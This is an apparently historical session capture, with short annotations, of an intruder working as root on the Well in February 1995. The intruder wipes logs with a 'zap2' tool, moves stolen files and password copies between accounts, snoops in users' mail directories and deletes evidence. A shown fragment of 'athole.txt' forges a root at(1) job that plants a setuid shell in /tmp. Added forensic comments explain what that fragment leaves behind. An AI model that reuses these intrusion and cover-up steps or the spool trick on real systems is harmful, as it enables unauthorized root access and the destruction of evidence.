Kevin On Demand
- Moving and Hiding - kevin-on-demand.takedown.com 4026
- Start: 1995 Feb 14 13:40:36
- Total Run Time: 15:36
- From NETCOM-atl7.netcom.net to netcom6.netcom.com.
- On the Well, cleaning up — panicked? Paranoid behavior: moving material from the dono account to other accounts, such as cybertek, and looking for additional places where he might have been logged; cleaning up.
well# zap2 dono
Zap2!
well# zap2 dono
Zap2!
well# zap2 dono
^C
well# last dono &
[1] 22275
working...
well# cd /home/c/y/cybertek
well# ls
(biod) c68hx.tar.Z inn neword.out.Z
(nfsd) c68ka.tar.Z inn.resu nfs.tar.gz
0108.gz cards.gz inter.arc nohup.out
0211.inm cloak itool ns.c
1022csn.tar.Z cloak.c kermit nw.tar.Z
4004 cust.out.Z key2.zip o.tar.Z
News eye.tar.gz kocher.tar.Z okitsu.tar.Z
a68hx.tar.Z f.c lile oldctek.tar.Z
aa foo.gz log1 oldnw.tar.Z
aliases.pag foosh log2 out.gz
asm11 fooshtool mail.tar passwd
athole.txt g.c marty.tar.gz.crypt passwdrace
btraq.tar.gz hc11 master.passwd portd.c
bug.sh ho.lck mbox pres
c.c ifj.c.gz.crypt mbox.Z pw-backup.23.tar.Z
c68ha.tar.Z in.telnetd mconnect.c satan.tar.Z
c68hs.tar.Z inm netshit sendmail.tar.Z
c68hv.tar.Z inmet newoki.tar.Z sgstuff.gz
well# more athole.txt
#include<sys/time.h>
#include<sys/wait.h>
#include<stdio.h>
/* Buffer size presumably used by the remainder of athole.txt; only the
 * declarations up to the env[] table are visible in this listing (the
 * pager was quit before the rest of the file). */
#define ATSIZE 512
/* Spool directory that at(1) jobs are read from on this system. */
static char Atdir[] = "/usr/spool/at";
/* Template for a file placed in the at(1) spool. The "# owner: root" /
 * "# jobname" / "# shell" / "# notify by mail" header lines resemble the
 * header the at daemon writes for a legitimately queued root job; the body
 * copies /bin/sh to /tmp/- and chmods it 6711 (setuid + setgid, with
 * execute for others), i.e. it leaves a privileged shell in /tmp.
 * Forensic review note: a spool entry whose owner header does not match
 * the file's real owner, a queued job that writes under /tmp, or a setuid
 * copy of sh in /tmp are the artifacts to look for on a host where this
 * tool was found; the spool directory's permissions are the control that
 * decides whether an unprivileged user can plant such a file. */
static char Atformat[] = "\
# owner: root\n\
# jobname: chkfpd\n\
# shell: sh\n\
# notify by mail: no\n\
\n\
exec 2>&-\n\
/bin/cp /bin/sh /tmp/-\n\
/bin/chmod 6711 /tmp/-\n\
exit 0\n\
\n";
/* Empty, NULL-terminated environment table. How it is used is outside the
 * visible portion of the file (presumably an envp for an exec* call —
 * confirm against the full source). */
static char *env[] = {
0
};
q
[1] + Done last dono
well# ls -tla nfs*
-rw-r--r-- 1 root other 341563 Feb 14 13:41 nfs.tar.gz
well# pwd
/home/c/y/cybertek
well# ls
(biod) eye.tar.gz master.passwd sniffer.c.gz
(nfsd) f.c mbox solsniff
0108.gz foo.gz mbox.Z solsniff.c
0211.inm foosh mconnect.c sportd
1022csn.tar.Z fooshtool netshit ss.c
4004 g.c newoki.tar.Z sss
News hc11 neword.out.Z sum
a68hx.tar.Z ho.lck nfs.tar.gz sunsniffer.c
aa ifj.c.gz.crypt nohup.out syscheck
aliases.pag in.telnetd ns.c tapelog.out.Z
asm11 inm nw.tar.Z tcpd.tar.Z
athole.txt inmet o.tar.Z tcpd.tar.gz.crypt
btraq.tar.gz inn okitsu.tar.Z time
bug.sh inn.resu oldctek.tar.Z unxor.c
c.c inter.arc oldnw.tar.Z vsr.gz.crypt
c68ha.tar.Z itool out.gz wietse
c68hs.tar.Z kermit passwd z
c68hv.tar.Z key2.zip passwdrace zap
c68hx.tar.Z kocher.tar.Z portd.c zap.c
c68ka.tar.Z lile pres zap2
cards.gz log1 pw-backup.23.tar.Z zap2.c
cloak log2 satan.tar.Z zipcrack.zip
cloak.c mail.tar sendmail.tar.Z zipcrypt.zip
cust.out.Z marty.tar.gz.crypt sgstuff.gz zipstuff.tar.Z
well# pwd
/home/c/y/cybertek
well# ls *.c
c.c g.c portd.c sunsniffer.c zap2.c
cloak.c mconnect.c solsniff.c unxor.c
f.c ns.c ss.c zap.c
well# ps -ef | grep cp
^C
well# ps -ef | grep cp &
[1] 23475 23476
well# pwd
/home/c/y/cybertek
well# find . -exec chown cybertek {} \; &
[2] 23633
well# ls -tla g.c
-rw-rw-rw- 1 root other 18680 Feb 14 13:40 g.c
well# ls -tla a*
-rw-r--r-- 1 cybertek other 1024 Feb 14 13:40 aliases.pag
-rw-r--r-- 1 cybertek other 1781771 Feb 14 13:40 aa
-rwxrwxrwx 1 cybertek other 314800 Feb 14 13:40 asm11
-rw-r--r-- 1 cybertek other 2914 Feb 14 13:40 athole.txt
-rw-r--r-- 1 cybertek other 1016017 Feb 14 13:40 a68hx.tar.Z
well#
root 23476 21921 9 13:43:44 pts/102 0:00 grep cp
nuucp 19803 1 23 13:35:00 ? 0:00 /usr/lib/sendmail -frfriess@Dialup.FranceNet.FR -oi delphi.com!bisseni
nuucp 19608 1 27 13:34:38 ? 0:00 /usr/lib/sendmail -frfriess@Dialup.FranceNet.FR -oi delphi.com!bisseni
well# pwd
/home/c/y/cybertek
well# du
6 ./.cfdir
2 ./News
61282 ./hc11
23026 ./itool
186798 .
well# cd
[1] Done ps -ef | grep cp
well# du
2 ./News
23026 ./itool
61282 ./hc11
187006 .
well# ls -tla | grep dr
drwxr-xr-x 5 dono well 2048 Feb 13 16:55 .
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
drw-r--r-- 2 dono well 512 Jan 16 22:33 hc11
drw-r--r-- 2 dono well 512 Dec 31 12:21 News
-rw-r--r-- 1 dono well 4621 Dec 11 20:45 passwdrace
[2] + Done find . -exec chown cybertek {} ;
well# cd /home/c/y/cybertek
well# cat nohup*
well# ls -tla nohu*
-rw------- 1 cybertek other 0 Feb 14 13:40 nohup.out
well# rm nohup.out
well# du
6 ./.cfdir
2 ./News
61282 ./hc11
23026 ./itool
186798 .
well# pwd
/home/c/y/cybertek
well# nohup pcp -r $HOME/* . &
[1] 24856
pcp: Command not found
[1] Exit 1 pcp -r /home/d/o/dono/* .
well# nohup cp -r $HOME/* . &
[1] 24922
well# pwd
/home/c/y/cybertek
well# cd /home/j/l/jlittman
well# ls -tla
total 1526
-rw------- 1 jlittman well 312377 Feb 13 16:35 .inbox
drwxr-sr-x 33 root sys 512 Feb 10 10:43 ..
-rw------- 1 jlittman well 437255 Feb 6 13:05 mbox
drwxr-xr-x 2 jlittman well 512 Feb 5 20:27 .
-rw-r--r-- 1 jlittman well 0 Jan 26 18:02 .news_time
-rw------- 1 jlittman well 191 Oct 31 12:23 .bash_history
well# cd /home/j/o/johnm
well# ls -tla | head
total 644
drwxr-sr-x 156 root sys 3072 Feb 14 11:25 ..
-rw------- 1 johnm well 16 Feb 6 11:49 .forward
drwxr-xr-x 9 johnm well 1024 Feb 6 11:49 .
drwxr-xr-x 2 johnm well 512 Feb 6 11:43 News
-rw------- 1 johnm well 0 Feb 6 11:36 .inbox
-rw------- 1 johnm well 216848 Feb 6 11:36 mbox
-rw-r--r-- 1 johnm well 0 Jan 26 18:02 .news_time
drwxr-xr-x 2 johnm well 512 Jan 25 14:58 .nn
-rw------- 1 johnm well 12895 Jan 25 14:58 .newsrc
well# cd /var/log
well# ls
OLD cron license_log multi.log tac.log wtmproll
ascend.wtmp daemon mail popper wfile.err
auth finger multi.err syslog wfile.log
well# grep ftp /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd -l
# Tftp service is provided primarily for booting. Most sites run this
tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -s /tftpboot
well# ls -tla
total 9598
-rw-r----- 1 root staff 4077131 Feb 14 13:48 mail
-rw-r--r-- 1 root staff 284767 Feb 14 13:48 popper
-rw-r--r-- 1 nobody other 75288 Feb 14 13:47 finger
-rw-r----- 1 root staff 230799 Feb 14 13:47 daemon
-rw-r----- 1 root staff 4470 Feb 14 13:47 auth
-rw-r--r-- 1 root other 28272 Feb 14 13:43 tac.log
-rw-r--r-- 1 root other 7812 Feb 14 13:27 ascend.wtmp
drwxr-xr-x 22 root sys 512 Feb 14 13:00 ..
-rw-rw-rw- 1 root root 117218 Feb 14 12:43 license_log
-rw-r--r-- 1 root well 23986 Feb 14 11:50 wfile.log
drwxr-sr-x 5 root root 512 Feb 14 00:06 wtmproll
drwxr-xr-x 2 root staff 2048 Feb 14 00:04 OLD
drwxr-x--x 4 root staff 512 Feb 14 00:04 .
-rw-rw---- 1 root lundeen 4366 Jan 26 13:52 wfile.err
-rw-r--r-- 1 root root 127 Jan 9 15:54 multi.log
-rw------- 1 root root 134 Dec 29 14:23 multi.err
-rw-r--r-- 1 root other 0 Feb 27 1994 cron
-rw-r----- 1 root staff 0 Sep 27 1993 syslog
well# grep -i dono * &
[2] 25589
[1] Done cp -r /home/d/o/dono/* .
finger:Feb 13 02:09:48 gaia.internex.net: dono
license_log:11/26 13:25:37 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log:11/26 19:05:26 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log: 2/05 19:41:32 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
license_log: 2/05 19:41:57 (suntechd) DENIED: sunpro.c v3.000 by dono@anyhost(/dev/tty)
mail:Feb 14 10:20:59 well sendmail[24926]: KAA24926: from=<donosy-l@fuw.edu.pl>,
size=5379, class=-60, pri=143379, nrcpts=1, msgid=<9502141642.AA07689@albert2>,
proto=ESMTP, relay=sunic.sunet.se [192.36.125.2]
well# cd /home/c/y/cybertek
[2] Done grep -i dono *
well# find . -exec chown cybertek {} \; &
[1] 25805
well# rm nohup*
No match
well# pwd
/home/c/y/cybertek
well# cd
well# ls
(biod) eye.tar.gz master.passwd solsniff
(nfsd) f.c mbox solsniff.c
0108.gz foo.gz mbox.Z sportd
0211.inm foosh mconnect.c ss.c
1022csn.tar.Z fooshtool netshit sss
4004 g.c newoki.tar.Z sum
News hc11 neword.out.Z sunsniffer.c
a68hx.tar.Z ho.lck nfs.tar.gz syscheck
aa ifj.c.gz.crypt ns.c tapelog.out.Z
aliases.pag in.telnetd nw.tar.Z tcpd.tar.Z
asm11 inm o.tar.Z tcpd.tar.gz.crypt
athole.txt inmet okitsu.tar.Z time
btraq.tar.gz inn oldctek.tar.Z unxor.c
bug.sh inn.resu oldnw.tar.Z vsr.gz.crypt
c.c inter.arc out.gz wietse
c68ha.tar.Z itool passwd z
c68hs.tar.Z kermit passwdrace zap
c68hv.tar.Z key2.zip portd.c zap.c
c68hx.tar.Z kocher.tar.Z pres zap2
c68ka.tar.Z lile pw-backup.23.tar.Z zap2.c
cards.gz log1 satan.tar.Z zipcrack.zip
cloak log2 sendmail.tar.Z zipcrypt.zip
cloak.c mail.tar sgstuff.gz zipstuff.tar.Z
cust.out.Z marty.tar.gz.crypt sniffer.c.gz
well# rm -i *
rm: remove (biod) (y/n)? y
rm: remove (nfsd) (y/n)? y
rm: remove 0108.gz (y/n)? n
rm: remove 0211.inm (y/n)? n
rm: remove 1022csn.tar.Z (y/n)? y
rm: remove 4004 (y/n)? n
rm: News is a directory
rm: remove a68hx.tar.Z (y/n)? y
rm: remove aa (y/n)? y
rm: remove aliases.pag (y/n)? y
rm: remove asm11 (y/n)? n
rm: remove athole.txt (y/n)? y
rm: remove btraq.tar.gz (y/n)? y
rm: remove bug.sh (y/n)? y
rm: remove c.c (y/n)? y
rm: remove c68ha.tar.Z (y/n)? n
rm: remove c68hs.tar.Z (y/n)? n
rm: remove c68hv.tar.Z (y/n)? n
rm: remove c68hx.tar.Z (y/n)? n
rm: remove c68ka.tar.Z (y/n)? n
rm: remove cards.gz (y/n)? y
rm: remove cloak (y/n)? n
rm: remove cloak.c (y/n)? n
rm: remove cust.out.Z (y/n)? n
rm: remove eye.tar.gz y
rm: remove f.c (y/n)? y
rm: remove foo.gz (y/n)? y
rm: remove foosh (y/n)? y
rm: remove fooshtool (y/n)? y
rm: remove g.c (y/n)? n
rm: hc11 is a directory
rm: remove ho.lck (y/n)? y
rm: remove ifj.c.gz.crypt (y/n)? y
rm: remove in.telnetd (y/n)? y
rm: remove inm (y/n)? y
rm: remove inmet (y/n)? y
rm: remove inn (y/n)? y
rm: remove inn.resu (y/n)? y
rm: remove inter.arc (y/n)? y
rm: itool is a directory
rm: remove kermit (y/n)? y
rm: remove key2.zip (y/n)? n
rm: remove kocher.tar.Z (y/n)? n
rm: remove lile (y/n)? y
rm: remove log1 (y/n)? n
rm: remove log2 (y/n)? n
rm: remove mail.tar (y/n)? y
rm: remove marty.tar.gz.crypt (y/n)? y
rm: remove master.passwd (y/n)? y
rm: remove mbox (y/n)? y
rm: remove mbox.Z (y/n)? y
rm: remove mconnect.c (y/n)? n
rm: remove netshit (y/n)? y
rm: remove newoki.tar.Z (y/n)? n
rm: remove neword.out.Z (y/n)? y
rm: remove nfs.tar.gz (y/n)? y
rm: remove ns.c (y/n)? n
rm: remove nw.tar.Z (y/n)? n
rm: remove o.tar.Z (y/n)? n
rm: remove okitsu.tar.Z (y/n)? n
rm: remove oldctek.tar.Z (y/n)? n
rm: remove oldnw.tar.Z (y/n)? n
rm: remove out.gz (y/n)? y
rm: remove passwd (y/n)? y
rm: remove passwdrace (y/n)? y
rm: remove portd.c (y/n)? n
rm: remove pres (y/n)? y
rm: remove pw-backup.23.tar.Z (y/n)? y
rm: remove satan.tar.Z (y/n)? n
rm: remove sendmail.tar.Z (y/n)? n
rm: remove sgstuff.gz (y/n)? y
rm: remove sniffer.c.gz (y/n)? y
rm: remove solsniff (y/n)? y
rm: remove solsniff.c (y/n)? y
rm: remove sportd (y/n)? n
rm: remove ss.c (y/n)? y
rm: remove sss (y/n)? y
rm: remove sum (y/n)? n
rm: remove sunsniffer.c (y/n)? y
rm: remove syscheck (y/n)? y
rm: remove tapelog.out.Z (y/n)? y
rm: remove tcpd.tar.Z (y/n)? y
rm: remove tcpd.tar.gz.crypt y
rm: remove time (y/n)? n
rm: remove unxor.c (y/n)? n
rm: remove vsr.gz.crypt (y/n)? y
rm: remove wietse (y/n)? y
rm: remove z (y/n)? y
rm: remove zap (y/n)? n
rm: remove zap.c (y/n)? n
rm: remove zap2 (y/n)? n
rm: remove zap2.c (y/n)? n
rm: remove zipcrack.zip (y/n)? n
rm: remove zipcrypt.zip (y/n)? n
rm: remove zipstuff.tar.Z (y/n)? n
[1] + Done find . -exec chown cybertek {} ;
well# ls
0108.gz c68ka.tar.Z log1 oldnw.tar.Z zap.c
0211.inm cloak log2 portd.c zap2
4004 cloak.c mconnect.c satan.tar.Z zap2.c
News cust.out.Z newoki.tar.Z sendmail.tar.Z zipcrack.zip
asm11 g.c ns.c sportd zipcrypt.zip
c68ha.tar.Z hc11 nw.tar.Z sum zipstuff.tar.Z
c68hs.tar.Z itool o.tar.Z time
c68hv.tar.Z key2.zip okitsu.tar.Z unxor.c
c68hx.tar.Z kocher.tar.Z oldctek.tar.Z zap
well# ls -tla asm11
-rwxrwxrwx 1 dono well 314800 Feb 7 22:45 asm11
well# rm portd.c
well# ls -tla | grep dr
drwxr-xr-x 5 dono well 2048 Feb 14 13:54 .
drwxr-sr-x 98 root sys 2048 Feb 13 11:59 ..
drwxrwxrwx 2 dono well 512 Feb 5 01:18 itool
drw-r--r-- 2 dono well 512 Jan 16 22:33 hc11
drw-r--r-- 2 dono well 512 Dec 31 12:21 News
well# rm 0211*
well# ls hc11 itool
hc11:
c682f.tar.Z hc16.tar.Z lmgr.tar.Z wsl3.tar.Z
c682x.tar.Z license.tar.Z wsl.tar.Z zhc11.taz
hc11new.tar.Z licstuff.tar.Z wsl2.tar.Z
itool:
c68hv.tar.Z hc11f.tar.Z mikem.tar.Z
cosmic.tar.Z hc11new.tar.Z wsl.tar.Z
well# rm -rf News
well# cd
well# du
23026 ./itool
61282 ./hc11
156464 .
well# ls
0108.gz cloak log1 oldctek.tar.Z zap
4004 cloak.c log2 oldnw.tar.Z zap.c
asm11 cust.out.Z mconnect.c satan.tar.Z zap2
c68ha.tar.Z g.c newoki.tar.Z sendmail.tar.Z zap2.c
c68hs.tar.Z hc11 ns.c sportd zipcrack.zip
c68hv.tar.Z itool nw.tar.Z sum zipcrypt.zip
c68hx.tar.Z key2.zip o.tar.Z time zipstuff.tar.Z
c68ka.tar.Z kocher.tar.Z okitsu.tar.Z unxor.c
well# ls hc11
c682f.tar.Z hc16.tar.Z lmgr.tar.Z wsl3.tar.Z
c682x.tar.Z license.tar.Z wsl.tar.Z zhc11.taz
hc11new.tar.Z licstuff.tar.Z wsl2.tar.Z
well# mv c68* hc11
well#